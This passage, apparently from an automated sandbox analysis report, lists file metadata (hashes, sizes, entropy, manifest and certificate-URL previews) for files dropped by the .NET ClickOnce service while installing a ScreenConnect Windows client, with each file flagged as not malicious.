                                                                                                                                                                                                                                                      SHA-512:488BF8D10E6D2CE1F7CAE91B8AE9446E605CADE44A08ED97CCCF4172646EDE2F8BA279110DF9D7003A78ABAEBE33BA2B1A0A584159FF20B6FD717317092A21FA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... .............(..(...............................................B..@.'.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                      Entropy (8bit):3.1440865988908953
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKQPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:YPiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                      MD5:5DF746F38F3A9F41ED16A8AC1B3C1543
                                                                                                                                                                                                                                                      SHA1:E353A4CB585205E877018AF80746E54063CB05CC
                                                                                                                                                                                                                                                      SHA-256:B3C561B622B6F83BAAA7C07A5D76AD5E2EDF1BA8F8B4C728BFFAD1DF1C3B4468
                                                                                                                                                                                                                                                      SHA-512:AB291942BE23F508AB609797E2CBEEB9F5A560B61F51149168A26C599E13E810EA2D8BCF8E15FDA53A448A0B2A0DAC420B813CA86AD0EB77F5C1AD4415F1A154
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ............_'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                                                                                      Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKHfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:/qtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                      MD5:C8695AD868C5D679FEFA80294D6E8754
                                                                                                                                                                                                                                                      SHA1:5C86FED4E4E70015DD9141374E6A26C19E2C2358
                                                                                                                                                                                                                                                      SHA-256:CAC8A754E503319D65A1EDAC1146CA6CFC6C2AFE37C1C86A1D39B680022B95BF
                                                                                                                                                                                                                                                      SHA-512:21430A739FBE1E4DFC1E58BAEB9873BDCF625E0F32D5850F4899E0318291E1998F4988A953C7E85B6EB66941BAF01A1EF0576972FE6D5C292CBCE119AEC4E2DE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ..........j[w'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                      Entropy (8bit):3.988822088625967
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKq9sbetlIls0fOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:4sRmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                      MD5:5D95EE8A208CDCF95FAA883B2B58B6BC
                                                                                                                                                                                                                                                      SHA1:7C10D362DB4B483D9006B68C56CB22C07773C88C
                                                                                                                                                                                                                                                      SHA-256:22D03BCE0326E5D6F71D54C7EA35A5559CA27F2BC4150053828DABD686D75979
                                                                                                                                                                                                                                                      SHA-512:8C19856F728AE2B544607D282F525598FAE13B2790472D98B20EFE311F5FED62D78B4FE483E1D637B16EA7FC1741ABCB89A709F3586BEC3240D7A3A4EA834E3F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....(... .._l'..(................].G{%....}p.*....................}p.*.. ........\...&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                                                                                      Entropy (8bit):3.060772882719261
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKBhLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:JhLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                      MD5:7EE0D20871EEBC26C6F87D13613FCD63
                                                                                                                                                                                                                                                      SHA1:16ABB2199B0994B06EB54EEC38884D5F19EC9039
                                                                                                                                                                                                                                                      SHA-256:8A7C4BE405C901F5D5EDE7F860CB105421ACBEFA2C91F4BA376A78C2C6F71592
                                                                                                                                                                                                                                                      SHA-512:8B75E7702EE14368B47C0324D6C4D5536148E0BD2C1EB911E5B5CF76A17F0E85E1390508E698E3424923ED720F880F74347D31098E314B9DDB59C9C08DD4120B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....l....H..N'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25496
                                                                                                                                                                                                                                                      Entropy (8bit):5.584548820720437
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:Crq5BjGch63X91yYFX9R/QPIBM7YfGOxUdrVuQ9575Jeud4r:CWVh63X9PX9R/QPI+0fGOxQDee0
                                                                                                                                                                                                                                                      MD5:2E2FF68AA93F1E43A47F51BB04C45769
                                                                                                                                                                                                                                                      SHA1:BCF2F5E86E4C458A52A67C27B06B89EF50953CCF
                                                                                                                                                                                                                                                      SHA-256:7C42D915394ABF651E4D960BCC8AA1150246D87962FA4950AB8CB8DAB99BAF44
                                                                                                                                                                                                                                                      SHA-512:ED4E3FCF566206D7EF779CFB2922DD542FFF284F0DDA5793974624CEAD934CD9A5D4367B3593C9B9ABD8AE44A2A87475368954C5849E72377A5105BD039F7C06
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3452
                                                                                                                                                                                                                                                      Entropy (8bit):4.228306711669954
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:CIEAeF7lMDWW+LgJOe6S+9owQX7gq7mLoKp3Ga4FhkG1WllcQF/0hIYX:CsWWOeV+WwQXzmLoK8dF2G10cQF8hIYX
                                                                                                                                                                                                                                                      MD5:395ADCCFE5F13918F08B5AF960A51BF7
                                                                                                                                                                                                                                                      SHA1:B15D2B66D112F30A13328FB5005D36F93A84CC25
                                                                                                                                                                                                                                                      SHA-256:BC49C4B9BC7EAA2641F1A0EA823CBFC2AFA47FA53DB3D2BD0E5799120F601574
                                                                                                                                                                                                                                                      SHA-512:1132814C470B11A194A05D1B39D1A10B73143BBC22FA648B4FA501CF3ED8A6DEC3E9B96AAB9EE825C9924964C32C2F40A7B10513A7C49FD6E54798EA85D158DC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH..............D.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........U..........'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................l...............................................l...............................................l...............................................l...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5256
                                                                                                                                                                                                                                                      Entropy (8bit):3.951576570549869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:jw4+Rzg5heV+Ww7kkKJOlVAlWVgvljwnANbz:aRzg4JuKS6EVJAp
                                                                                                                                                                                                                                                      MD5:D028B077E075F702841F7A735AB8ED23
                                                                                                                                                                                                                                                      SHA1:9F37FF688D91121BD7EC092B88D0E55AD0E953D7
                                                                                                                                                                                                                                                      SHA-256:32DDC98DA862DEC48FAB02ABAA1057DCE62933C8896B07D8723A36887473508F
                                                                                                                                                                                                                                                      SHA-512:B0D999B7415E06B0E68EC0C05D6C00178E99ED3997824A058930ED91AAE343EB6268855513C25DD9FEA3F31FB01C4F56447F2E92550D2CF96EABBF2BA04888AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6584
                                                                                                                                                                                                                                                      Entropy (8bit):3.8583768102805798
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:sTh0PPBpRieV+Www+8Wp5x32eeugEuA6QwIwozLTVqO/t7:sOPPvJyp5kv5pAbVR
                                                                                                                                                                                                                                                      MD5:C4204C0185307C52F05A3D69537A4D24
                                                                                                                                                                                                                                                      SHA1:43D29EB782E0FD59FCA4034FD3C497F013E6279F
                                                                                                                                                                                                                                                      SHA-256:1D8A06C1489853E5D140A9488A181EB46FFA682BD96C797FD0D4AD81831DFE69
                                                                                                                                                                                                                                                      SHA-512:CA6EF4A3FCA94B5D27A29082AF70150AB4D3423D0C6525C38C26C43C686F4D2E825DA26647FDFE75C95910DF68A5454282729EE66C915D9847A98779EE9BF536
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3032
                                                                                                                                                                                                                                                      Entropy (8bit):4.462772651353851
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ma6Q/cggJ0e6S+9oww7gk7FaOoT/cLwwL+qcfnwbOA:maV/cGeV+WwwFFaOog8wL+jfnEOA
                                                                                                                                                                                                                                                      MD5:38B53F032728A8F590B59948103E5C83
                                                                                                                                                                                                                                                      SHA1:7AEF8D3B94A8BEF38D42FA9318C18C32B93BBFCC
                                                                                                                                                                                                                                                      SHA-256:3F04510F0C2A3338FFCF6B0121EBC5B0B43E21592A7C65044E48026ADDD6F940
                                                                                                                                                                                                                                                      SHA-512:09636E9E55B15C0759278FCB2679EA6591A11F0CC603B32A72188A1A31E1263A239AA5BC1190167C227B2FBE5680788CA85971F3B46C648BDE63FD919928BCC1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14608
                                                                                                                                                                                                                                                      Entropy (8bit):5.7142108599202555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:l1xT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:l1V9rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                      MD5:FE98F26D5DB4E7866DE4489F168BA28F
                                                                                                                                                                                                                                                      SHA1:E52EE6EB7A90306D3537B3141A4C8B1BF2FC6027
                                                                                                                                                                                                                                                      SHA-256:82541E45E82B18A38DFE5D1EC5443CAFFE95B31BCEC378AE554F7BD236E9EEBD
                                                                                                                                                                                                                                                      SHA-512:483AA57826B1650660BB3B4553F7BB0441E89800E69B3DFE3E13E4459E8A42A7066BEE007610E2880E5E4D9185AE126858259D3B253E2EEB47C9683D7E7E9868
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........qf.Q..X.$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........U...............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%V..>...V.[;..jq.......3.............-........................E..................................l...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client................................... P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.3.8936%........................
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4428
                                                                                                                                                                                                                                                      Entropy (8bit):4.067107952546464
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:FjCDvx+1gJhe6S+9ow87g5W75uvsbO2V4glKvfvfTh5aTyA9Uvso9f:FjkeV+Ww8+45u6OrglKvvThkTyOmBf
                                                                                                                                                                                                                                                      MD5:705A8D85747155E81CA66F9E71B861E9
                                                                                                                                                                                                                                                      SHA1:45ACF93004EEDEC1C20D1B4E42C0CCBFFBD5E111
